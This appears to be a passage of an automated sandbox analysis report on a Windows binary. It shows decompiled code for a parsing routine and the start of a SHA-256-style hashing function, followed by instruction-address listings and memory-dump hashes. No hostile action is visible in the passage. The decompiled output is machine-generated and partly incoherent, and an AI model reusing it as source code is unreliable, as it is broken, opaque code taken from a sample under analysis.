																 *((char*)(_t585 + 0x130)) = 1;
															}
														}
													} else {
														__eflags = _v12 - _t490;
														if(_v12 > _t490) {
															goto L104;
														} else {
															goto L95;
														}
													}
												}
											} else {
												__eflags = _t572;
												if(_t572 < 0) {
													goto L104;
												} else {
													goto L92;
												}
											}
										}
									}
									return _t396;
								} else {
									if(__eflags < 0) {
										L21:
										_push(1);
										_a4 = _t570;
										E004192D4(_t599, _t592,  *((intOrPtr*)(_t390 + 8)) +  *_t390, _a84);
										_t584 = 0;
										__eflags = _a96;
										if(__eflags > 0) {
											L64:
											 *((char*)(_t486 + 0x135)) = 1;
											 *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4));
											goto L65;
										} else {
											if(__eflags < 0) {
												L24:
												_t438 = _a92 + 0xfffffff2;
												__eflags = _t438 - 0xb;
												if(__eflags > 0) {
													goto L64;
												} else {
													switch( *((intOrPtr*)(_t438 * 4 +  &M0041ADD2))) {
														case 0:
															__eax =  &_a60;
															__ecx = __esi;
															__eax = E00419845(__esi, __edx, _a108,  &_a60);
															__eax = 0;
															_a124 = __edi;
															__eflags = _a64 - __edi;
															if(__eflags > 0) {
																do {
																	__ecx = _a60;
																	__eflags =  *((char*)(__ecx + __eax));
																	if( *((char*)(__ecx + __eax)) != 0) {
																		_t156 =  &_a124;
																		 *_t156 = _a124 + 1;
																		__eflags =  *_t156;
																	}
																	__eax = __eax + 1;
																	__eflags = __eax - _a64;
																} while (__eflags < 0);
															}
															__edi = _a124;
															 &_a24 = E00419725( &_a24, __edi, __eflags);
															 &_a48 = E00419725( &_a48, __edi, __eflags);
															goto L35;
														case 1:
															__eax =  &_a24;
															goto L48;
														case 2:
															__eax =  &_a48;
															L48:
															__ecx = __esi;
															__eax = E00419845(__ecx, __edx, _a124, __eax);
															goto L35;
														case 3:
															_v16 = _t584;
															E00419747( &_v20, _t570, _t599, __eflags, _t592,  &_a72);
															_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
															E0040BBD0(_t486 + 0xd0, _t584);
															E00418E93( *((intOrPtr*)(_t592 + 0x38)),  *((intOrPtr*)(_t486 + 0xd0)), _t584);
															E0041911E(_t486 + 0xd8, __eflags,  *(_t486 + 0x5c) + 1);
															_t570 = 0;
															_t447 = 0;
															_a116 = 0;
															_a112 = 0;
															__eflags =  *(_t486 + 0x5c);
															if( *(_t486 + 0x5c) <= 0) {
																L32:
																_t570 = _t570 >> 1;
																 *( *((intOrPtr*)(_t486 + 0xd8)) + _t447 * 4) = _t570;
																__eflags = _a116 - _t584;
																if(_a116 != _t584) {
																	 *((char*)(_t592 + 0x3c)) = 1;
																}
																E00418E1D( &_v20);
																goto L35;
															} else {
																do {
																	_a120 = _a120 & 0x00000000;
																	_t451 =  *((intOrPtr*)(_t486 + 0xd0)) + _t570;
																	_t503 = _t584 - _t570 >> 1;
																	__eflags = _t503;
																	if(_t503 != 0) {
																		while(1) {
																			_t570 = _a120;
																			__eflags =  *((short*)(_t451 + _t570 * 2));
																			if( *((short*)(_t451 + _t570 * 2)) == 0) {
																				goto L30;
																			}
																			_a120 = _a120 + 1;
																			__eflags = _a120 - _t503;
																			if(_a120 < _t503) {
																				continue;
																			}
																			goto L30;
																		}
																	}
																	L30:
																	__eflags = _a120 - _t503;
																	if(_a120 == _t503) {
																		goto L87;
																	} else {
																		goto L31;
																	}
																	goto L130;
																	L31:
																	_t452 = _a112;
																	 *( *((intOrPtr*)(_t486 + 0xd8)) + _t452 * 4) = _a116 >> 1;
																	_t447 = _t452 + 1;
																	_t570 = _a116 + 2 + _a120 * 2;
																	_a116 = _t570;
																	_a112 = _t447;
																	__eflags = _t447 -  *(_t486 + 0x5c);
																} while (_t447 <  *(_t486 + 0x5c));
																goto L32;
															}
															goto L130;
														case 4:
															__eax = __ebx + 0x64;
															goto L51;
														case 5:
															__eax = __ebx + 0x7c;
															goto L51;
														case 6:
															__eax = __ebx + 0x94;
															goto L51;
														case 7:
															__eax =  &_v12;
															__ecx = __esi;
															_v12 = __edi;
															_v8 = __edi;
															_v4 = __edi;
															E00419893(__esi, __edx, __edi, __ebp, __eflags,  *((intOrPtr*)(__ebx + 0x5c)),  &_v12) =  &_a72;
															__ecx =  &_a8;
															_a12 = __di;
															__eax = E00419747( &_a8, __edx, __ebp, __eflags, __esi,  &_a72);
															_a120 = __edi;
															__eflags = _a108 - __edi;
															if(_a108 > __edi) {
																_a116 = __edi;
																do {
																	__edi =  *(__ebx + 0x58);
																	__eax = _v12;
																	__ecx = _a120;
																	__edi =  *(__ebx + 0x58) + _a116;
																	__al =  *((intOrPtr*)(_v12 + _a120));
																	 *((char*)(__edi + 0x13)) = __al;
																	__eflags = __al;
																	if(__al != 0) {
																		__ecx =  *((intOrPtr*)(__esi + 0x38));
																		 *((intOrPtr*)(__edi + 8)) = E00418FFB( *((intOrPtr*)(__esi + 0x38)));
																	}
																	_a120 = _a120 + 1;
																	__eax = _a120;
																	_a116 = _a116 + 0x18;
																	__eflags = _a120 - _a108;
																} while (_a120 < _a108);
															}
															__ecx =  &_a8;
															__eax = E00418E1D( &_a8);
															_push(_v12);
															L0041C160();
															_pop(__ecx);
															goto L35;
														case 8:
															goto L64;
														case 9:
															__eax = __ebx + 0xac;
															L51:
															__ecx = __esi;
															 &_a72 = E004198DE(__ecx, __edx, __eflags,  &_a72,  &_a72, _a108);
															L35:
															E00419652(_t486 + 0x108, _t570, _a92, _a96);
															goto L65;
														case 0xa:
															_a16 = __edi;
															__eflags = _a88 - __edi;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	L58:
																	__ecx =  *((intOrPtr*)(__esi + 0x38));
																	__eax = E00418E7C(__ecx, __edi);
																	__eflags = __al;
																	if(__al != 0) {
																		 *((char*)(__esi + 0x3c)) = 1;
																	}
																	_a16 = _a16 + 1;
																	asm("adc edi, 0x0");
																	__eflags = __edi - _a88;
																} else {
																	__eflags = _a84 - __edi;
																	if(_a84 > __edi) {
																		goto L58;
																		do {
																			do {
																				goto L58;
																			} while (__eflags < 0);
																			if(__eflags <= 0) {
																				goto L62;
																			}
																			goto L65;
																			L62:
																			__eax = _a84;
																			__eflags = _a16 - _a84;
																		} while (_a16 < _a84);
																	}
																}
															}
															L65:
															_t503 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
															__eflags = _t503;
															if(_t503 != 0) {
																goto L87;
															} else {
																E00418E1D(_t599);
																goto L67;
															}
															goto L130;
													}
												}
											} else {
												__eflags = _a92 - 0x40000000;
												if(_a92 > 0x40000000) {
													goto L64;
												} else {
													goto L24;
												}
											}
										}
									} else {
										__eflags = _a84 - _t503;
										if(_a84 > _t503) {
											goto L87;
										} else {
											goto L21;
										}
									}
								}
								goto L130;
							}
							E00418FB1(_t501);
							__eflags = _a108 - _a124 - _a40;
							if(_a108 - _a124 != _a40) {
								E00418E04(_t501);
							}
							_t556 = _a48;
							_t587 = 0;
							_t456 = 0;
							_a116 = 0;
							__eflags = _a124;
							if(_a124 > 0) {
								do {
									__eflags =  *((char*)(_t556 + _t456));
									if( *((char*)(_t556 + _t456)) != 0) {
										_t199 =  &_a116;
										 *_t199 = _a116 + 1;
										__eflags =  *_t199;
									}
									_t456 = _t456 + 1;
									__eflags = _t456 - _a124;
								} while (_t456 < _a124);
							}
							_a120 = _t587;
							__eflags = _a108 - _t587;
							if(__eflags > 0) {
								_t458 = _a24 - _t556;
								__eflags = _t458;
								_a112 = _t556;
								_a124 = _t587;
								_a88 = _t458;
								do {
									_t598 =  *((intOrPtr*)(_t486 + 0x58)) + _a124;
									_t459 = _a60;
									__eflags =  *((char*)(_t459 + _a120));
									_t460 = _t459 & 0xffffff00 |  *((char*)(_t459 + _a120)) == 0x00000000;
									 *(_t598 + 0x10) = _t460;
									 *((intOrPtr*)(_t598 + 0xc)) = 0;
									__eflags = _t460;
									if(_t460 == 0) {
										_t461 = _a112;
										_t579 = _a88;
										__eflags =  *(_t579 + _t461);
										 *((char*)(_t598 + 0x11)) = _t579 & 0xffffff00 |  *(_t579 + _t461) == 0x00000000;
										_t570 =  *_t461;
										_t462 = _t461 + 1;
										__eflags = _t462;
										_a96 =  *_t461;
										_a112 = _t462;
										 *_t598 = 0;
										 *((intOrPtr*)(_t598 + 4)) = 0;
										 *((char*)(_t598 + 0x12)) = 0;
									} else {
										_t465 = _a36;
										 *((char*)(_t598 + 0x11)) = 0;
										_a96 = 0;
										 *_t598 =  *((intOrPtr*)(_t465 + _t587 * 8));
										 *((intOrPtr*)(_t598 + 4)) =  *((intOrPtr*)(_t465 + 4 + _t587 * 8));
										_t467 = E004192B9( &_v44, _t587);
										 *((char*)(_t598 + 0x12)) = _t467;
										__eflags = _t467;
										if(_t467 != 0) {
											 *((intOrPtr*)(_t598 + 0xc)) =  *((intOrPtr*)(_v32 + _t587 * 4));
										}
										_t587 = _t587 + 1;
									}
									__eflags = _a116;
									if(_a116 != 0) {
										E0041967B(_t486 + 0xc4, _a96);
									}
									_a120 = _a120 + 1;
									_a124 = _a124 + 0x18;
									__eflags = _a120 - _a108;
								} while (__eflags < 0);
							}
							_push(_a48);
							L0041C160();
							_push(_a24);
							L0041C160();
							_push(_a60);
							L0041C160();
							_t603 = _t603 + 0xc;
						}
						goto L85;
					}
				} else {
					_t611 = _t570 - _t582;
					if(_t570 != _t582) {
						goto L9;
					} else {
						_push(_a124);
						_push(_a120);
						_t590 = _t486 + 0x100;
						_push(_a116);
						_t479 = E0041A63E(_t592, _t570, _t611,  *((intOrPtr*)(_t486 + 0xf0)),  *((intOrPtr*)(_t486 + 0xf4)), _t590,  &_a72, _a112);
						_a108 = _t479;
						if(_t479 == 0) {
							 *_t590 =  *_t590 +  *((intOrPtr*)(_t486 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
							_t582 = 0;
							__eflags = 0;
							goto L9;
						} else {
							E0041969C( &_a72);
							_t377 = _a108;
							L86:
							return _t377;
						}
					}
				}
				L130:
			}









































































                                          0x0041a836
                                          0x0041a837
                                          0x0041a83b
                                          0x0041a843
                                          0x0041a849
                                          0x0041a84e
                                          0x0041a854
                                          0x0041a874
                                          0x0041a874
                                          0x0041a856
                                          0x0041a856
                                          0x0041a858
                                          0x0041a85a
                                          0x0041a865
                                          0x0041a86d
                                          0x0041a86d
                                          0x0041a85a
                                          0x0041a876
                                          0x0041a879
                                          0x0041a87c
                                          0x0041a882
                                          0x0041a8e4
                                          0x0041a8e4
                                          0x0041a8e7
                                          0x0041a8ea
                                          0x0041a8ed
                                          0x0041a8f0
                                          0x0041a8f3
                                          0x0041a8f6
                                          0x0041a8f9
                                          0x0041a8fc
                                          0x0041a8ff
                                          0x0041a902
                                          0x0041a904
                                          0x0041a906
                                          0x0041a911
                                          0x0041a91e
                                          0x0041a929
                                          0x0041a931
                                          0x0041a937
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a906
                                          0x0041a93e
                                          0x0041a941
                                          0x0041a944
                                          0x0041ad95
                                          0x0041ad97
                                          0x0041ad9c
                                          0x0041ad9f
                                          0x0041ada4
                                          0x0041ada7
                                          0x0041adac
                                          0x0041adaf
                                          0x0041adba
                                          0x0041adbf
                                          0x0041adbf
                                          0x00000000
                                          0x0041a94a
                                          0x0041a94a
                                          0x0041a94c
                                          0x0041a95e
                                          0x0041a961
                                          0x0041a972
                                          0x0041a975
                                          0x0041a983
                                          0x0041a988
                                          0x0041a98b
                                          0x0041a98d
                                          0x0041a990
                                          0x0041a99b
                                          0x0041a99b
                                          0x0041a990
                                          0x0041a9a0
                                          0x0041a9a5
                                          0x0041a9a8
                                          0x0041a9ab
                                          0x0041a9b1
                                          0x0041a9b8
                                          0x0041a9bb
                                          0x0041a9be
                                          0x0041a9c1
                                          0x0041a9c4
                                          0x0041a9c7
                                          0x0041a9ca
                                          0x0041ac7d
                                          0x0041ac7d
                                          0x0041ac80
                                          0x0041ac85
                                          0x0041ac88
                                          0x0041ac8b
                                          0x0041ac8d
                                          0x0041ac90
                                          0x00000000
                                          0x00000000
                                          0x0041a9d7
                                          0x0041a9da
                                          0x0041a9e0
                                          0x0041a9e3
                                          0x0041a9e6
                                          0x0041a9e8
                                          0x0041a9eb
                                          0x0041adcb
                                          0x0041adcb
                                          0x0041add2
                                          0x0041add3
                                          0x0041add7
                                          0x0041add8
                                          0x0041add9
                                          0x0041addb
                                          0x0041addc
                                          0x0041addd
                                          0x0041ade1
                                          0x0041ade7
                                          0x0041ade9
                                          0x0041adeb
                                          0x0041aded
                                          0x0041adef
                                          0x0041adf1
                                          0x0041adf5
                                          0x0041adf9
                                          0x0041adfb
                                          0x0041adfd
                                          0x0041adff
                                          0x0041ae00
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae02
                                          0x0041ae08
                                          0x0041ae09
                                          0x0041ae0a
                                          0x0041ae0b
                                          0x0041ae0e
                                          0x0041ae12
                                          0x0041ae1a
                                          0x0041ae23
                                          0x0041ae2c
                                          0x0041ae35
                                          0x0041ae37
                                          0x0041ae3d
                                          0x0041ae43
                                          0x0041af36
                                          0x0041af36
                                          0x0041af36
                                          0x00000000
                                          0x0041ae49
                                          0x0041ae4f
                                          0x0041ae52
                                          0x0041ae58
                                          0x0041ae5e
                                          0x0041ae64
                                          0x0041ae6d
                                          0x0041ae6f
                                          0x0041ae72
                                          0x0041ae78
                                          0x0041ae7e
                                          0x0041ae88
                                          0x0041ae8e
                                          0x0041ae94
                                          0x0041ae97
                                          0x00000000
                                          0x0041ae9d
                                          0x0041ae9d
                                          0x0041aea7
                                          0x0041aea7
                                          0x0041aeae
                                          0x00000000
                                          0x0041aeb4
                                          0x0041aeb4
                                          0x0041aebb
                                          0x0041aebe
                                          0x0041aebe
                                          0x0041aec1
                                          0x0041aed1
                                          0x0041aed7
                                          0x0041aed9
                                          0x0041aed9
                                          0x0041aee9
                                          0x0041aeeb
                                          0x0041aef1
                                          0x0041aef4
                                          0x0041aef6
                                          0x0041aef9
                                          0x0041aefc
                                          0x0041af04
                                          0x0041af06
                                          0x0041af0c
                                          0x0041af15
                                          0x0041af1e
                                          0x0041af24
                                          0x0041af26
                                          0x0041af40
                                          0x0041af40
                                          0x0041af4e
                                          0x0041af51
                                          0x0041af53
                                          0x0041af55
                                          0x0041af58
                                          0x0041af5a
                                          0x0041af61
                                          0x0041af61
                                          0x0041af5c
                                          0x0041af5c
                                          0x0041af5f
                                          0x0041af68
                                          0x0041af6b
                                          0x0041af78
                                          0x0041af7b
                                          0x0041af80
                                          0x0041af82
                                          0x0041af93
                                          0x0041af96
                                          0x0041af99
                                          0x0041af9e
                                          0x0041afa1
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa8
                                          0x0041afae
                                          0x0041afb0
                                          0x0041afb0
                                          0x0041afb7
                                          0x0041afc1
                                          0x0041afc6
                                          0x0041afcb
                                          0x0041afce
                                          0x0041afd1
                                          0x0041afd4
                                          0x0041afd7
                                          0x0041afdc
                                          0x0041afdf
                                          0x0041afe9
                                          0x0041afe9
                                          0x0041afec
                                          0x00000000
                                          0x0041afee
                                          0x0041afee
                                          0x0041aff0
                                          0x00000000
                                          0x0041aff2
                                          0x0041aff2
                                          0x0041aff8
                                          0x0041affb
                                          0x0041affd
                                          0x0041b017
                                          0x0041b01c
                                          0x0041b01f
                                          0x0041b021
                                          0x0041b03b
                                          0x0041b03e
                                          0x0041b055
                                          0x0041b059
                                          0x00000000
                                          0x0041b05f
                                          0x0041b062
                                          0x0041b070
                                          0x0041b075
                                          0x0041b078
                                          0x0041b07d
                                          0x0041b080
                                          0x00000000
                                          0x0041b086
                                          0x0041b086
                                          0x0041b088
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041b088
                                          0x0041b080
                                          0x0041b040
                                          0x0041b043
                                          0x0041b04b
                                          0x00000000
                                          0x0041b04b
                                          0x0041b023
                                          0x0041b026
                                          0x0041b02e
                                          0x0041b033
                                          0x00000000
                                          0x0041b033
                                          0x0041b021
                                          0x0041aff0
                                          0x0041afe1
                                          0x0041afe1
                                          0x0041afe3
                                          0x0041b08e
                                          0x0041b091
                                          0x0041b0a1
                                          0x0041b0b0
                                          0x0041b0b6
                                          0x0041b0c0
                                          0x0041b0c8
                                          0x0041b0cd
                                          0x0041b0d0
                                          0x0041b0d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041afe3
                                          0x0041af84
                                          0x0041af84
                                          0x0041af86
                                          0x0041af86
                                          0x0041af89
                                          0x0041af8f
                                          0x0041af8f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af5f
                                          0x0041af5a
                                          0x0041af28
                                          0x0041af28
                                          0x0041af2f
                                          0x0041af2f
                                          0x00000000
                                          0x0041af2a
                                          0x0041af2a
                                          0x0041af2d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af2d
                                          0x0041af28
                                          0x0041aec3
                                          0x0041aec3
                                          0x0041aec6
                                          0x0041af38
                                          0x0041af38
                                          0x0041af38
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec6
                                          0x0041aeb6
                                          0x0041aeb6
                                          0x0041aeb9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aeb9
                                          0x0041aeb4
                                          0x0041ae9f
                                          0x0041ae9f
                                          0x0041aea1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aea1
                                          0x0041ae9d
                                          0x0041ae97
                                          0x0041af3d
                                          0x0041a9f1
                                          0x0041a9f1
                                          0x0041a9fc
                                          0x0041aa01
                                          0x0041aa06
                                          0x0041aa0f
                                          0x0041aa14
                                          0x0041aa16
                                          0x0041aa19
                                          0x0041ac56
                                          0x0041ac56
                                          0x0041ac63
                                          0x00000000
                                          0x0041aa1f
                                          0x0041aa1f
                                          0x0041aa2e
                                          0x0041aa31
                                          0x0041aa34
                                          0x0041aa37
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa3d
                                          0x00000000
                                          0x0041ab99
                                          0x0041aba0
                                          0x0041aba2
                                          0x0041aba7
                                          0x0041aba9
                                          0x0041abac
                                          0x0041abaf
                                          0x0041abb1
                                          0x0041abb1
                                          0x0041abb4
                                          0x0041abb8
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abbd
                                          0x0041abbe
                                          0x0041abbe
                                          0x0041abb1
                                          0x0041abc3
                                          0x0041abc9
                                          0x0041abd1
                                          0x00000000
                                          0x00000000
                                          0x0041abdb
                                          0x00000000
                                          0x00000000
                                          0x0041abee
                                          0x0041abde
                                          0x0041abe2
                                          0x0041abe4
                                          0x00000000
                                          0x00000000
                                          0x0041aa4c
                                          0x0041aa50
                                          0x0041aa5b
                                          0x0041aa65
                                          0x0041aa74
                                          0x0041aa84
                                          0x0041aa89
                                          0x0041aa8b
                                          0x0041aa8d
                                          0x0041aa90
                                          0x0041aa93
                                          0x0041aa96
                                          0x0041aaee
                                          0x0041aaf4
                                          0x0041aaf6
                                          0x0041aaf9
                                          0x0041aafc
                                          0x0041aafe
                                          0x0041aafe
                                          0x0041ab05
                                          0x00000000
                                          0x0041aa98
                                          0x0041aa98
                                          0x0041aa9e
                                          0x0041aaa6
                                          0x0041aaa8
                                          0x0041aaa8
                                          0x0041aaaa
                                          0x0041aaac
                                          0x0041aaac
                                          0x0041aaaf
                                          0x0041aab4
                                          0x00000000
                                          0x00000000
                                          0x0041aab6
                                          0x0041aab9
                                          0x0041aabc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aabc
                                          0x0041aaac
                                          0x0041aabe
                                          0x0041aabe
                                          0x0041aac1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aac7
                                          0x0041aaca
                                          0x0041aad5
                                          0x0041aade
                                          0x0041aadf
                                          0x0041aae3
                                          0x0041aae6
                                          0x0041aae9
                                          0x0041aae9
                                          0x00000000
                                          0x0041aa98
                                          0x00000000
                                          0x00000000
                                          0x0041ac0d
                                          0x00000000
                                          0x00000000
                                          0x0041ac12
                                          0x00000000
                                          0x00000000
                                          0x0041ac17
                                          0x00000000
                                          0x00000000
                                          0x0041ab20
                                          0x0041ab27
                                          0x0041ab29
                                          0x0041ab2c
                                          0x0041ab2f
                                          0x0041ab37
                                          0x0041ab3c
                                          0x0041ab3f
                                          0x0041ab43
                                          0x0041ab48
                                          0x0041ab4b
                                          0x0041ab4e
                                          0x0041ab50
                                          0x0041ab53
                                          0x0041ab53
                                          0x0041ab56
                                          0x0041ab59
                                          0x0041ab5c
                                          0x0041ab5f
                                          0x0041ab62
                                          0x0041ab65
                                          0x0041ab67
                                          0x0041ab69
                                          0x0041ab71
                                          0x0041ab71
                                          0x0041ab74
                                          0x0041ab77
                                          0x0041ab7a
                                          0x0041ab7e
                                          0x0041ab7e
                                          0x0041ab53
                                          0x0041ab83
                                          0x0041ab86
                                          0x0041ab8b
                                          0x0041ab8e
                                          0x0041ab93
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041abf3
                                          0x0041abf9
                                          0x0041abfc
                                          0x0041ac03
                                          0x0041ab0a
                                          0x0041ab16
                                          0x00000000
                                          0x00000000
                                          0x0041ac1f
                                          0x0041ac22
                                          0x0041ac25
                                          0x0041ac27
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x0041ac31
                                          0x0041ac36
                                          0x0041ac38
                                          0x0041ac3a
                                          0x0041ac3a
                                          0x0041ac3e
                                          0x0041ac42
                                          0x0041ac45
                                          0x0041ac29
                                          0x0041ac29
                                          0x0041ac2c
                                          0x00000000
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x00000000
                                          0x00000000
                                          0x0041ac4a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041ac4c
                                          0x0041ac4c
                                          0x0041ac4f
                                          0x0041ac4f
                                          0x0041ac54
                                          0x0041ac2c
                                          0x0041ac27
                                          0x0041ac66
                                          0x0041ac6c
                                          0x0041ac6c
                                          0x0041ac6f
                                          0x00000000
                                          0x0041ac75
                                          0x0041ac78
                                          0x00000000
                                          0x0041ac78
                                          0x00000000
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa21
                                          0x0041aa21
                                          0x0041aa28
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aa28
                                          0x0041aa1f
                                          0x0041a9f3
                                          0x0041a9f3
                                          0x0041a9f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a9f6
                                          0x0041a9f1
                                          0x00000000
                                          0x0041a9eb
                                          0x0041ac96
                                          0x0041aca1
                                          0x0041aca4
                                          0x0041aca6
                                          0x0041aca6
                                          0x0041acab
                                          0x0041acae
                                          0x0041acb0
                                          0x0041acb2
                                          0x0041acb5
                                          0x0041acb8
                                          0x0041acba
                                          0x0041acba
                                          0x0041acbe
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc3
                                          0x0041acc4
                                          0x0041acc4
                                          0x0041acba
                                          0x0041acc9
                                          0x0041accc
                                          0x0041accf
                                          0x0041acd8
                                          0x0041acd8
                                          0x0041acda
                                          0x0041acdd
                                          0x0041ace0
                                          0x0041ace3
                                          0x0041ace6
                                          0x0041ace9
                                          0x0041acef
                                          0x0041acf3
                                          0x0041acf8
                                          0x0041acfb
                                          0x0041acfe
                                          0x0041ad00
                                          0x0041ad33
                                          0x0041ad36
                                          0x0041ad39
                                          0x0041ad3f
                                          0x0041ad42
                                          0x0041ad44
                                          0x0041ad44
                                          0x0041ad45
                                          0x0041ad48
                                          0x0041ad4b
                                          0x0041ad4d
                                          0x0041ad50
                                          0x0041ad02
                                          0x0041ad02
                                          0x0041ad05
                                          0x0041ad08
                                          0x0041ad0e
                                          0x0041ad18
                                          0x0041ad1b
                                          0x0041ad20
                                          0x0041ad23
                                          0x0041ad25
                                          0x0041ad2d
                                          0x0041ad2d
                                          0x0041ad30
                                          0x0041ad30
                                          0x0041ad53
                                          0x0041ad57
                                          0x0041ad62
                                          0x0041ad62
                                          0x0041ad67
                                          0x0041ad6d
                                          0x0041ad71
                                          0x0041ad71
                                          0x0041ace3
                                          0x0041ad7a
                                          0x0041ad7d
                                          0x0041ad82
                                          0x0041ad85
                                          0x0041ad8a
                                          0x0041ad8d
                                          0x0041ad92
                                          0x0041ad92
                                          0x00000000
                                          0x0041a94c
                                          0x0041a884
                                          0x0041a884
                                          0x0041a886
                                          0x00000000
                                          0x0041a888
                                          0x0041a888
                                          0x0041a88e
                                          0x0041a891
                                          0x0041a897
                                          0x0041a8ad
                                          0x0041a8b2
                                          0x0041a8b7
                                          0x0041a8cf
                                          0x0041a8d7
                                          0x0041a8dd
                                          0x0041a8e2
                                          0x0041a8e2
                                          0x00000000
                                          0x0041a8b9
                                          0x0041a8bc
                                          0x0041a8c1
                                          0x0041adc1
                                          0x0041adc8
                                          0x0041adc8
                                          0x0041a8b7
                                          0x0041a886
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e76ba46fa9958c57c63c48877315b86a749a66682a328e3da440c3d135764959
                                          • Instruction ID: 4dad77f0705915c109804cafeeec3e4362490793768c25b28525cfb381627a1a
                                          • Opcode Fuzzy Hash: e76ba46fa9958c57c63c48877315b86a749a66682a328e3da440c3d135764959
                                          • Instruction Fuzzy Hash: 25124771901248DFCB25DF69C980AED7BF6BF44304F14846EF81587262DB38E895CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B350, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 230COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040B350(intOrPtr* __ecx, void* __edx, int _a4) {
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				signed int _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				int _t140;
				signed int _t142;
				signed int _t144;
				signed int _t148;
				void* _t155;
				intOrPtr* _t158;
				int _t177;
				intOrPtr* _t180;
				intOrPtr* _t184;
				intOrPtr* _t191;
				signed int _t205;
				signed int _t225;
				void* _t240;
				void* _t275;

				_t158 = __ecx;
				_t177 = _a4;
				_t222 = __edx;
				_v100 = __ecx;
				if(_t177 == 0) {
					L17:
					return _t140;
				} else {
					_t142 =  *(__ecx + 0x20) & 0x0000003f;
					 *(__ecx + 0x20) =  *(__ecx + 0x20) + _t177;
					asm("adc dword [ebx+0x24], 0x0");
					_t240 = 0x40 - _t142;
					if(0x40 <= _t177) {
						_a4 = _t177 - 0x40;
						memcpy(_t142 + __ecx + 0x28, __edx, 0x40);
						_t275 =  &_v124 + 0xc;
						_v116 = _t222 + _t240;
						while(1) {
							_t144 = 0;
							_t180 = _t158 + 0x30;
							do {
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x4c + _t144 * 4)) =  *((intOrPtr*)(_t180 - 8));
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x50 + _t144 * 4)) =  *((intOrPtr*)(_t180 - 4));
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x54 + _t144 * 4)) =  *_t180;
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x58 + _t144 * 4)) =  *((intOrPtr*)(_t180 + 4));
								_t144 = _t144 + 4;
								_t180 = _t180 + 0x10;
							} while (_t144 < 0x10);
							_v96 =  *_t158;
							_v92 =  *((intOrPtr*)(_t158 + 4));
							_v88 =  *((intOrPtr*)(_t158 + 8));
							_v84 =  *((intOrPtr*)(_t158 + 0xc));
							_v80 =  *((intOrPtr*)(_t158 + 0x10));
							_v76 =  *((intOrPtr*)(_t158 + 0x14));
							_t205 = 0;
							_v72 =  *((intOrPtr*)(_t158 + 0x18));
							_v68 =  *((intOrPtr*)(_t158 + 0x1c));
							_v120 = 0;
							do {
								_t225 = 1;
								_t184 =  &_v64;
								_v112 = 1;
								_t48 = _t225 - 5; // -4
								_t148 = _t48;
								_v108 = _t184;
								_v124 = 0x41f150 + _t205 * 4;
								_v104 = 0x10;
								do {
									if(_t205 != 0) {
										_t55 = _t225 - 3; // -2
										asm("ror ebx, 0x12");
										asm("ror ebp, 0x7");
										asm("ror esi, 0x13");
										asm("ror ebp, 0x11");
